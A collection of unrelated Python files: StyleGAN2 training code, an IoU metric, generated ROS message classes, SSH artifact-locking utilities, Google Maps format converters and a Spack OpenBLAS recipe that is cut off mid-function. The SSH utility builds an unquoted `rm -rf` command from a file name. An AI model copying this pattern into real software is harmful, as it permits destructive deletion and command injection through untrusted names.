self.path_length_penalty = PathLengthPenalty(0.99).to(self.device)
# Add model hooks to monitor layer outputs
if self.log_layer_outputs:
hook_model_outputs(self.mode, self.discriminator, 'discriminator')
hook_model_outputs(self.mode, self.generator, 'generator')
hook_model_outputs(self.mode, self.mapping_network, 'mapping_network')
# Discriminator and generator losses
self.discriminator_loss = DiscriminatorLoss().to(self.device)
self.generator_loss = GeneratorLoss().to(self.device)
# Create optimizers
self.discriminator_optimizer = torch.optim.Adam(
self.discriminator.parameters(),
lr=self.learning_rate, betas=self.adam_betas
)
self.generator_optimizer = torch.optim.Adam(
self.generator.parameters(),
lr=self.learning_rate, betas=self.adam_betas
)
self.mapping_network_optimizer = torch.optim.Adam(
self.mapping_network.parameters(),
lr=self.mapping_network_learning_rate, betas=self.adam_betas
)
# Set tracker configurations
tracker.set_image("generated", True)
def get_w(self, batch_size: int):
"""
### Sample $w$
This samples $z$ randomly and get $w$ from the mapping network.
We also apply style mixing sometimes where we generate two latent variables
$z_1$ and $z_2$ and get corresponding $w_1$ and $w_2$.
Then we randomly sample a cross-over point and apply $w_1$ to
the generator blocks before the cross-over point and
$w_2$ to the blocks after.
"""
# Mix styles
if torch.rand(()).item() < self.style_mixing_prob:
# Random cross-over point
cross_over_point = int(torch.rand(()).item() * self.n_gen_blocks)
# Sample $z_1$ and $z_2$
z2 = torch.randn(batch_size, self.d_latent).to(self.device)
z1 = torch.randn(batch_size, self.d_latent).to(self.device)
# Get $w_1$ and $w_2$
w1 = self.mapping_network(z1)
w2 = self.mapping_network(z2)
# Expand $w_1$ and $w_2$ for the generator blocks and concatenate
w1 = w1[None, :, :].expand(cross_over_point, -1, -1)
w2 = w2[None, :, :].expand(self.n_gen_blocks - cross_over_point, -1, -1)
return torch.cat((w1, w2), dim=0)
# Without mixing
else:
# Sample $z$ and $z$
z = torch.randn(batch_size, self.d_latent).to(self.device)
# Get $w$ and $w$
w = self.mapping_network(z)
# Expand $w$ for the generator blocks
return w[None, :, :].expand(self.n_gen_blocks, -1, -1)
def get_noise(self, batch_size: int):
"""
### Generate noise
This generates noise for each [generator block](index.html#generator_block)
"""
# List to store noise
noise = []
# Noise resolution starts from $4$
resolution = 4
# Generate noise for each generator block
for i in range(self.n_gen_blocks):
# The first block has only one $3 \times 3$ convolution
if i == 0:
n1 = None
# Generate noise to add after the first convolution layer
else:
n1 = torch.randn(batch_size, 1, resolution, resolution, device=self.device)
# Generate noise to add after the second convolution layer
n2 = torch.randn(batch_size, 1, resolution, resolution, device=self.device)
# Add noise tensors to the list
noise.append((n1, n2))
# Next block has $2 \times$ resolution
resolution *= 2
# Return noise tensors
return noise
def generate_images(self, batch_size: int):
"""
### Generate images
This generate images using the generator
"""
# Get $w$
w = self.get_w(batch_size)
# Get noise
noise = self.get_noise(batch_size)
# Generate images
images = self.generator(w, noise)
# Return images and $w$
return images, w
def step(self, idx: int):
"""
### Training Step
"""
# Train the discriminator
with monit.section('Discriminator'):
# Reset gradients
self.discriminator_optimizer.zero_grad()
# Accumulate gradients for `gradient_accumulate_steps`
for i in range(self.gradient_accumulate_steps):
# Update `mode`. Set whether to log activation
with self.mode.update(is_log_activations=(idx + 1) % self.log_generated_interval == 0):
# Sample images from generator
generated_images, _ = self.generate_images(self.batch_size)
# Discriminator classification for generated images
fake_output = self.discriminator(generated_images.detach())
# Get real images from the data loader
real_images = next(self.loader).to(self.device)
# We need to calculate gradients w.r.t. real images for gradient penalty
if (idx + 1) % self.lazy_gradient_penalty_interval == 0:
real_images.requires_grad_()
# Discriminator classification for real images
real_output = self.discriminator(real_images)
# Get discriminator loss
real_loss, fake_loss = self.discriminator_loss(real_output, fake_output)
disc_loss = real_loss + fake_loss
# Add gradient penalty
if (idx + 1) % self.lazy_gradient_penalty_interval == 0:
# Calculate and log gradient penalty
gp = self.gradient_penalty(real_images, real_output)
tracker.add('loss.gp', gp)
# Multiply by coefficient and add gradient penalty
disc_loss = disc_loss + 0.5 * self.gradient_penalty_coefficient * gp * self.lazy_gradient_penalty_interval
# Compute gradients
disc_loss.backward()
# Log discriminator loss
tracker.add('loss.discriminator', disc_loss)
if (idx + 1) % self.log_generated_interval == 0:
# Log discriminator model parameters occasionally
tracker.add('discriminator', self.discriminator)
# Clip gradients for stabilization
torch.nn.utils.clip_grad_norm_(self.discriminator.parameters(), max_norm=1.0)
# Take optimizer step
self.discriminator_optimizer.step()
# Train the generator
with monit.section('Generator'):
# Reset gradients
self.generator_optimizer.zero_grad()
self.mapping_network_optimizer.zero_grad()
# Accumulate gradients for `gradient_accumulate_steps`
for i in range(self.gradient_accumulate_steps):
# Sample images from generator
generated_images, w = self.generate_images(self.batch_size)
# Discriminator classification for generated images
fake_output = self.discriminator(generated_images)
# Get generator loss
gen_loss = self.generator_loss(fake_output)
# Add path length penalty
if idx > self.lazy_path_penalty_after and (idx + 1) % self.lazy_path_penalty_interval == 0:
# Calculate path length penalty
plp = self.path_length_penalty(w, generated_images)
# Ignore if `nan`
if not torch.isnan(plp):
tracker.add('loss.plp', plp)
gen_loss = gen_loss + plp
# Calculate gradients
gen_loss.backward()
# Log generator loss
tracker.add('loss.generator', gen_loss)
if (idx + 1) % self.log_generated_interval == 0:
# Log discriminator model parameters occasionally
tracker.add('generator', self.generator)
tracker.add('mapping_network', self.mapping_network)
# Clip gradients for stabilization
torch.nn.utils.clip_grad_norm_(self.generator.parameters(), max_norm=1.0)
torch.nn.utils.clip_grad_norm_(self.mapping_network.parameters(), max_norm=1.0)
# Take optimizer step
self.generator_optimizer.step()
self.mapping_network_optimizer.step()
# Log generated images
if (idx + 1) % self.log_generated_interval == 0:
tracker.add('generated', torch.cat([generated_images[:6], real_images[:3]], dim=0))
# Save model checkpoints
if (idx + 1) % self.save_checkpoint_interval == 0:
experiment.save_checkpoint()
# Flush tracker
tracker.save()
def train(self):
"""
## Train model
"""
# Loop for `training_steps`
for i in monit.loop(self.training_steps):
# Take a training step
self.step(i)
#
if (i + 1) % self.log_generated_interval == 0:
tracker.new_line()
def main():
"""
### Train StyleGAN2
"""
# Create an experiment
experiment.create(name='stylegan2')
# Create configurations object
configs = Configs()
# Set configurations and override some
experiment.configs(configs, {
'device.cuda_device': 0,
'image_size': 64,
'log_generated_interval': 200
})
# Initialize
configs.init()
# Set models for saving and loading
experiment.add_pytorch_models(mapping_network=configs.mapping_network,
generator=configs.generator,
discriminator=configs.discriminator)
# Start the experiment
with experiment.start():
# Run the training loop
configs.train()
#
if __name__ == '__main__':
main()
|
py | 7dfa954689a3a78bcaed66f8704f4118bdced662 | counter_name = 'S:SRcurrentAI.VAL'
Size = wx.Size(667, 473)
logfile = '//id14bxf/data/anfinrud_1106/Logfiles/test.log'
average_count = 10
max_value = nan
min_value = nan
start_fraction = 0
reject_outliers = False
outlier_cutoff = 2.5
show_statistics = False
time_window = 30
|
py | 7dfa95e2a9544b56bc44994ad307dd6e4dc424f4 | from typing import Optional, Union
import numpy as np
import torch
def compute_iou(
pred_mask: Union[np.ndarray, torch.Tensor],
gt_mask: Union[np.ndarray, torch.Tensor],
threshold: Optional[float] = 0.5,
eps: float = 1e-7
) -> Union[np.ndarray, torch.Tensor]:
"""
:param pred_mask: (B x H x W) or (H x W)
:param gt_mask: (B x H x W) or (H x W), same shape with pred_mask
:param threshold: a binarization threshold
:param eps: a small value for computational stability
:return: (B) or (1)
"""
assert pred_mask.shape == gt_mask.shape, f"{pred_mask.shape} != {gt_mask.shape}"
# assert 0. <= pred_mask.to(torch.float32).min() and pred_mask.max().to(torch.float32) <= 1., f"{pred_mask.min(), pred_mask.max()}"
if threshold is not None:
pred_mask = pred_mask > threshold
if isinstance(pred_mask, np.ndarray):
intersection = np.logical_and(pred_mask, gt_mask).sum(axis=(-1, -2))
union = np.logical_or(pred_mask, gt_mask).sum(axis=(-1, -2))
ious = (intersection / (union + eps))
else:
intersection = torch.logical_and(pred_mask, gt_mask).sum(dim=(-1, -2))
union = torch.logical_or(pred_mask, gt_mask).sum(dim=(-1, -2))
ious = (intersection / (union + eps)).cpu()
return ious |
py | 7dfa96035d45cbc1d573c62425296e7dbdb38146 | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from test/receiver_get_emitter_directionRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class receiver_get_emitter_directionRequest(genpy.Message):
_md5sum = "f9df5232b65af94f73f79fe6d84301bb"
_type = "test/receiver_get_emitter_directionRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """uint8 ask
"""
__slots__ = ['ask']
_slot_types = ['uint8']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
ask
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(receiver_get_emitter_directionRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.ask is None:
self.ask = 0
else:
self.ask = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_get_struct_B().pack(self.ask))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 1
(self.ask,) = _get_struct_B().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_get_struct_B().pack(self.ask))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 1
(self.ask,) = _get_struct_B().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_B = None
def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from test/receiver_get_emitter_directionResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class receiver_get_emitter_directionResponse(genpy.Message):
_md5sum = "3f61a8da1ee4e83406fd5157b36d50cb"
_type = "test/receiver_get_emitter_directionResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float64[] direction
"""
__slots__ = ['direction']
_slot_types = ['float64[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
direction
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(receiver_get_emitter_directionResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.direction is None:
self.direction = []
else:
self.direction = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
length = len(self.direction)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.direction))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.direction = struct.unpack(pattern, str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
length = len(self.direction)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.direction.tostring())
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.direction = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
class receiver_get_emitter_direction(object):
_type = 'test/receiver_get_emitter_direction'
_md5sum = 'cad5a90bedce22b568c949b40e9cc6e0'
_request_class = receiver_get_emitter_directionRequest
_response_class = receiver_get_emitter_directionResponse
|
py | 7dfa9773a8f0247399141338adb00bd0fa12428e | """
This file contains utility functions for scripts responsible for pushing
and pulling build artifacts.
"""
__author__ = "Jakub Kudzia"
__copyright__ = "Copyright (C) 2016 ACK CYFRONET AGH"
__license__ = "This software is released under the MIT license cited in " \
"LICENSE.txt"
import os
import time
ARTIFACTS_DIR = 'artifacts'
ARTIFACTS_EXT = '.tar.gz'
PARTIAL_EXT = '.partial'
DEFAULT_BRANCH = 'develop'
def lock_file(ssh, file_name):
"""
Set lock on file_name via ssh. Hangs if file_name is currently locked.
:param ssh: sshclient with opened connection
:type ssh: paramiko.SSHClient
:param file_name: name of file to be locked
:type file_name: str
:return None
"""
_, stdout, _ = ssh.exec_command("lockfile {}.lock".format(file_name),
get_pty=True)
while not stdout.channel.exit_status_ready():
# ssh.exec_command is asynchronous therefore we must wait till command
# exit status is ready
time.sleep(1)
def unlock_file(ssh, file_name):
"""
Delete lock on file_name via ssh.
:param ssh: sshclient with opened connection
:type ssh: paramiko.SSHClient
:param file_name: name of file to be unlocked
:type file_name: str
:return None
"""
delete_file(ssh, "{}.lock".format(file_name))
def artifact_path(plan, branch):
"""
Returns path to artifact for specific plan and branch. Path is relative
to user's home directory on repository machine.
:param plan: name of current bamboo plan
:type plan: str
:param branch: name of current git branch
:type branch: str
"""
return os.path.join(ARTIFACTS_DIR, plan, branch + ARTIFACTS_EXT)
def delete_file(ssh, file_name):
"""
Delete file named file_name via ssh.
:param ssh: sshclient with opened connection
:type ssh: paramiko.SSHClient
:param file_name: name of file to be unlocked
:type file_name: str
:return None
"""
ssh.exec_command("rm -rf {}".format(file_name))
|
py | 7dfa9882df0d908823e243b9a754c7d3281a6d80 | #
# Copyright 2014 Google Inc. All rights reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
"""Converts Python types to string representations suitable for Maps API server.
For example:
sydney = {
"lat" : -33.8674869,
"lng" : 151.2069902
}
convert.latlng(sydney)
# '-33.8674869,151.2069902'
"""
def format_float(arg):
"""Formats a float value to be as short as possible.
Truncates float to 8 decimal places and trims extraneous
trailing zeros and period to give API args the best
possible chance of fitting within 2000 char URL length
restrictions.
For example:
format_float(40) -> "40"
format_float(40.0) -> "40"
format_float(40.1) -> "40.1"
format_float(40.001) -> "40.001"
format_float(40.0010) -> "40.001"
format_float(40.000000001) -> "40"
format_float(40.000000009) -> "40.00000001"
:param arg: The lat or lng float.
:type arg: float
:rtype: string
"""
return ("%.8f" % float(arg)).rstrip("0").rstrip(".")
def latlng(arg):
"""Converts a lat/lon pair to a comma-separated string.
For example:
sydney = {
"lat" : -33.8674869,
"lng" : 151.2069902
}
convert.latlng(sydney)
# '-33.8674869,151.2069902'
For convenience, also accepts lat/lon pair as a string, in
which case it's returned unchanged.
:param arg: The lat/lon pair.
:type arg: string or dict or list or tuple
"""
if is_string(arg):
return arg
normalized = normalize_lat_lng(arg)
return "%s,%s" % (format_float(normalized[0]), format_float(normalized[1]))
def normalize_lat_lng(arg):
"""Take the various lat/lng representations and return a tuple.
Accepts various representations:
1) dict with two entries - "lat" and "lng"
2) list or tuple - e.g. (-33, 151) or [-33, 151]
:param arg: The lat/lng pair.
:type arg: dict or list or tuple
:rtype: tuple (lat, lng)
"""
if isinstance(arg, dict):
if "lat" in arg and "lng" in arg:
return arg["lat"], arg["lng"]
if "latitude" in arg and "longitude" in arg:
return arg["latitude"], arg["longitude"]
# List or tuple.
if _is_list(arg):
return arg[0], arg[1]
raise TypeError(
"Expected a lat/lng dict or tuple, "
"but got %s" % type(arg).__name__)
def location_list(arg):
"""Joins a list of locations into a pipe separated string, handling
the various formats supported for lat/lng values.
For example:
p = [{"lat" : -33.867486, "lng" : 151.206990}, "Sydney"]
convert.waypoint(p)
# '-33.867486,151.206990|Sydney'
:param arg: The lat/lng list.
:type arg: list
:rtype: string
"""
if isinstance(arg, tuple):
# Handle the single-tuple lat/lng case.
return latlng(arg)
else:
return "|".join([latlng(location) for location in as_list(arg)])
def join_list(sep, arg):
"""If arg is list-like, then joins it with sep.
:param sep: Separator string.
:type sep: string
:param arg: Value to coerce into a list.
:type arg: string or list of strings
:rtype: string
"""
return sep.join(as_list(arg))
def as_list(arg):
"""Coerces arg into a list. If arg is already list-like, returns arg.
Otherwise, returns a one-element list containing arg.
:rtype: list
"""
if _is_list(arg):
return arg
return [arg]
def _is_list(arg):
"""Checks if arg is list-like. This excludes strings and dicts."""
if isinstance(arg, dict):
return False
if isinstance(arg, str): # Python 3-only, as str has __iter__
return False
return (not _has_method(arg, "strip")
and _has_method(arg, "__getitem__")
or _has_method(arg, "__iter__"))
def is_string(val):
"""Determines whether the passed value is a string, safe for 2/3."""
try:
basestring
except NameError:
return isinstance(val, str)
return isinstance(val, basestring)
def time(arg):
"""Converts the value into a unix time (seconds since unix epoch).
For example:
convert.time(datetime.now())
# '1409810596'
:param arg: The time.
:type arg: datetime.datetime or int
"""
# handle datetime instances.
if _has_method(arg, "timestamp"):
arg = arg.timestamp()
if isinstance(arg, float):
arg = int(arg)
return str(arg)
def _has_method(arg, method):
"""Returns true if the given object has a method with the given name.
:param arg: the object
:param method: the method name
:type method: string
:rtype: bool
"""
return hasattr(arg, method) and callable(getattr(arg, method))
def components(arg):
"""Converts a dict of components to the format expected by the Google Maps
server.
For example:
c = {"country": "US", "postal_code": "94043"}
convert.components(c)
# 'country:US|postal_code:94043'
:param arg: The component filter.
:type arg: dict
:rtype: basestring
"""
# Components may have multiple values per type, here we
# expand them into individual key/value items, eg:
# {"country": ["US", "AU"], "foo": 1} -> "country:AU", "country:US", "foo:1"
def expand(arg):
for k, v in arg.items():
for item in as_list(v):
yield "%s:%s" % (k, item)
if isinstance(arg, dict):
return "|".join(sorted(expand(arg)))
raise TypeError(
"Expected a dict for components, "
"but got %s" % type(arg).__name__)
def bounds(arg):
"""Converts a lat/lon bounds to a comma- and pipe-separated string.
Accepts two representations:
1) string: pipe-separated pair of comma-separated lat/lon pairs.
2) dict with two entries - "southwest" and "northeast". See convert.latlng
for information on how these can be represented.
For example:
sydney_bounds = {
"northeast" : {
"lat" : -33.4245981,
"lng" : 151.3426361
},
"southwest" : {
"lat" : -34.1692489,
"lng" : 150.502229
}
}
convert.bounds(sydney_bounds)
# '-34.169249,150.502229|-33.424598,151.342636'
:param arg: The bounds.
:type arg: dict
"""
if is_string(arg) and arg.count("|") == 1 and arg.count(",") == 2:
return arg
elif isinstance(arg, dict):
if "southwest" in arg and "northeast" in arg:
return "%s|%s" % (latlng(arg["southwest"]),
latlng(arg["northeast"]))
raise TypeError(
"Expected a bounds (southwest/northeast) dict, "
"but got %s" % type(arg).__name__)
def size(arg):
if isinstance(arg, int):
return "%sx%s" % (arg, arg)
elif _is_list(arg):
return "%sx%s" % (arg[0], arg[1])
raise TypeError(
"Expected a size int or list, "
"but got %s" % type(arg).__name__)
def decode_polyline(polyline):
"""Decodes a Polyline string into a list of lat/lng dicts.
See the developer docs for a detailed description of this encoding:
https://developers.google.com/maps/documentation/utilities/polylinealgorithm
:param polyline: An encoded polyline
:type polyline: string
:rtype: list of dicts with lat/lng keys
"""
points = []
index = lat = lng = 0
while index < len(polyline):
result = 1
shift = 0
while True:
b = ord(polyline[index]) - 63 - 1
index += 1
result += b << shift
shift += 5
if b < 0x1f:
break
lat += (~result >> 1) if (result & 1) != 0 else (result >> 1)
result = 1
shift = 0
while True:
b = ord(polyline[index]) - 63 - 1
index += 1
result += b << shift
shift += 5
if b < 0x1f:
break
lng += ~(result >> 1) if (result & 1) != 0 else (result >> 1)
points.append({"lat": lat * 1e-5, "lng": lng * 1e-5})
return points
def encode_polyline(points):
"""Encodes a list of points into a polyline string.
See the developer docs for a detailed description of this encoding:
https://developers.google.com/maps/documentation/utilities/polylinealgorithm
:param points: a list of lat/lng pairs
:type points: list of dicts or tuples
:rtype: string
"""
last_lat = last_lng = 0
result = ""
for point in points:
ll = normalize_lat_lng(point)
lat = int(round(ll[0] * 1e5))
lng = int(round(ll[1] * 1e5))
d_lat = lat - last_lat
d_lng = lng - last_lng
for v in [d_lat, d_lng]:
v = ~(v << 1) if v < 0 else v << 1
while v >= 0x20:
result += (chr((0x20 | (v & 0x1f)) + 63))
v >>= 5
result += (chr(v + 63))
last_lat = lat
last_lng = lng
return result
def shortest_path(locations):
"""Returns the shortest representation of the given locations.
The Elevations API limits requests to 2000 characters, and accepts
multiple locations either as pipe-delimited lat/lng values, or
an encoded polyline, so we determine which is shortest and use it.
:param locations: The lat/lng list.
:type locations: list
:rtype: string
"""
if isinstance(locations, tuple):
# Handle the single-tuple lat/lng case.
locations = [locations]
encoded = "enc:%s" % encode_polyline(locations)
unencoded = location_list(locations)
if len(encoded) < len(unencoded):
return encoded
else:
return unencoded
|
py | 7dfa98efd883546c08e4f0355e7e3784eab7f071 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
from spack.package_test import compare_output_file, compile_c_and_execute
import spack.architecture
class Openblas(MakefilePackage):
"""OpenBLAS: An optimized BLAS library"""
homepage = 'http://www.openblas.net'
url = 'http://github.com/xianyi/OpenBLAS/archive/v0.2.19.tar.gz'
git = 'https://github.com/xianyi/OpenBLAS.git'
version('develop', branch='develop')
version('0.3.7', sha256='bde136122cef3dd6efe2de1c6f65c10955bbb0cc01a520c2342f5287c28f9379')
version('0.3.6', sha256='e64c8fe083832ffbc1459ab6c72f71d53afd3b36e8497c922a15a06b72e9002f')
version('0.3.5', sha256='0950c14bd77c90a6427e26210d6dab422271bc86f9fc69126725833ecdaa0e85')
version('0.3.4', sha256='4b4b4453251e9edb5f57465bf2b3cf67b19d811d50c8588cdf2ea1f201bb834f')
version('0.3.3', sha256='49d88f4494ae780e3d7fa51769c00d982d7cdb73e696054ac3baa81d42f13bab')
version('0.3.2', sha256='e8ba64f6b103c511ae13736100347deb7121ba9b41ba82052b1a018a65c0cb15')
version('0.3.1', sha256='1f5e956f35f3acdd3c74516e955d797a320c2e0135e31d838cbdb3ea94d0eb33')
version('0.3.0', '42cde2c1059a8a12227f1e6551c8dbd2')
version('0.2.20', '48637eb29f5b492b91459175dcc574b1')
version('0.2.19', '28c998054fd377279741c6f0b9ea7941')
version('0.2.18', '805e7f660877d588ea7e3792cda2ee65')
version('0.2.17', '664a12807f2a2a7cda4781e3ab2ae0e1')
version('0.2.16', 'fef46ab92463bdbb1479dcec594ef6dc')
version('0.2.15', 'b1190f3d3471685f17cfd1ec1d252ac9')
variant(
'shared',
default=True,
description='Build shared libraries as well as static libs.'
)
variant('ilp64', default=False, description='64 bit integers')
variant('pic', default=True, description='Build position independent code')
variant('cpu_target', default='auto',
description='Set CPU target architecture (leave empty for '
'autodetection; GENERIC, SSE_GENERIC, NEHALEM, ...)')
variant(
'threads', default='none',
description='Multithreading support',
values=('pthreads', 'openmp', 'none'),
multi=False
)
variant(
'virtual_machine',
default=False,
description="Adding options to build openblas on Linux virtual machine"
)
variant(
'avx2',
default=True,
description='Enable use of AVX2 instructions'
)
variant(
'avx512',
default=False,
description='Enable use of AVX512 instructions'
)
# virtual dependency
provides('blas')
provides('lapack')
# OpenBLAS >=3.0 has an official way to disable internal parallel builds
patch('make.patch', when='@0.2.16:0.2.20')
# This patch is in a pull request to OpenBLAS that has not been handled
# https://github.com/xianyi/OpenBLAS/pull/915
# UPD: the patch has been merged starting version 0.2.20
patch('openblas_icc.patch', when='@:0.2.19%intel')
patch('openblas_icc_openmp.patch', when='@:0.2.20%[email protected]:')
patch('openblas_icc_fortran.patch', when='%[email protected]:')
patch('openblas_icc_fortran2.patch', when='%[email protected]:')
# Fixes compilation error on POWER8 with GCC 7
# https://github.com/xianyi/OpenBLAS/pull/1098
patch('power8.patch', when='@0.2.18:0.2.19 %[email protected]: target=power8')
# Change file comments to work around clang 3.9 assembler bug
# https://github.com/xianyi/OpenBLAS/pull/982
patch('openblas0.2.19.diff', when='@0.2.19')
# Fix CMake export symbol error
# https://github.com/xianyi/OpenBLAS/pull/1703
patch('openblas-0.3.2-cmake.patch', when='@0.3.1:0.3.2')
# Disable experimental TLS code that lead to many threading issues
# https://github.com/xianyi/OpenBLAS/issues/1735#issuecomment-422954465
# https://github.com/xianyi/OpenBLAS/issues/1761#issuecomment-421039174
# https://github.com/xianyi/OpenBLAS/pull/1765
patch('https://github.com/xianyi/OpenBLAS/commit/4d183e5567346f80f2ef97eb98f8601c47f8cb56.patch',
sha256='714aea33692304a50bd0ccde42590c176c82ded4a8ac7f06e573dc8071929c33',
when='@0.3.3')
# Fix parallel build issues on filesystems
# with missing sub-second timestamp resolution
patch('https://github.com/xianyi/OpenBLAS/commit/79ea839b635d1fd84b6ce8a47e086f01d64198e6.patch',
sha256='f1b066a4481a50678caeb7656bf3e6764f45619686ac465f257c8017a2dc1ff0',
when='@0.3.0:0.3.3')
# Add conditions to f_check to determine the Fujitsu compiler
patch('openblas_fujitsu.patch', when='%fj')
conflicts('%intel@16', when='@0.2.15:0.2.19')
@property
def parallel(self):
# unclear whether setting `-j N` externally was supported before 0.3
return self.spec.version >= Version('0.3.0')
@run_before('edit')
def check_compilers(self):
# As of 06/2016 there is no mechanism to specify that packages which
# depends on Blas/Lapack need C or/and Fortran symbols. For now
# require both.
if self.compiler.fc is None:
raise InstallError(
'OpenBLAS requires both C and Fortran compilers!'
)
# Add support for OpenMP
if (self.spec.satisfies('threads=openmp') and
self.spec.satisfies('%clang')):
if str(self.spec.compiler.version).endswith('-apple'):
raise InstallError("Apple's clang does not support OpenMP")
if '@:0.2.19' in self.spec:
# Openblas (as of 0.2.19) hardcoded that OpenMP cannot
# be used with any (!) compiler named clang, bummer.
raise InstallError(
'OpenBLAS @:0.2.19 does not support OpenMP with clang!'
)
@property
def make_defs(self):
# Configure fails to pick up fortran from FC=/abs/path/to/fc, but
# works fine with FC=/abs/path/to/gfortran.
# When mixing compilers make sure that
# $SPACK_ROOT/lib/spack/env/<compiler> have symlinks with reasonable
# names and hack them inside lib/spack/spack/compilers/<compiler>.py
make_defs = [
'CC={0}'.format(spack_cc),
'FC={0}'.format(spack_fc),
]
# force OpenBLAS to use externally defined parallel build
if self.spec.version < Version('0.3'):
make_defs.append('MAKE_NO_J=1') # flag defined by our make.patch
else:
make_defs.append('MAKE_NB_JOBS=0') # flag provided by OpenBLAS
if self.spec.variants['virtual_machine'].value:
make_defs += [
'DYNAMIC_ARCH=1',
'NUM_THREADS=64', # OpenBLAS stores present no of CPUs as max
]
if self.spec.variants['cpu_target'].value != 'auto':
make_defs += [
'TARGET={0}'.format(self.spec.variants['cpu_target'].value)
]
# invoke make with the correct TARGET for aarch64
elif 'aarch64' in spack.architecture.sys_type():
make_defs += [
'TARGET=ARMV8'
]
if self.spec.satisfies('%gcc@:4.8.4'):
make_defs += ['NO_AVX2=1']
if '~shared' in self.spec:
if '+pic' in self.spec:
make_defs.extend([
'CFLAGS={0}'.format(self.compiler.pic_flag),
'FFLAGS={0}'.format(self.compiler.pic_flag)
])
make_defs += ['NO_SHARED=1']
# fix missing _dggsvd_ and _sggsvd_
if self.spec.satisfies('@0.2.16'):
make_defs += ['BUILD_LAPACK_DEPRECATED=1']
# Add support for multithreading
if self.spec.satisfies('threads=openmp'):
make_defs += ['USE_OPENMP=1', 'USE_THREAD=1']
elif self.spec.satisfies('threads=pthreads'):
make_defs += ['USE_OPENMP=0', 'USE_THREAD=1']
else:
make_defs += ['USE_OPENMP=0', 'USE_THREAD=0']
# 64bit ints
if '+ilp64' in self.spec:
make_defs += ['INTERFACE64=1']
if self.spec.target.family == 'x86_64':
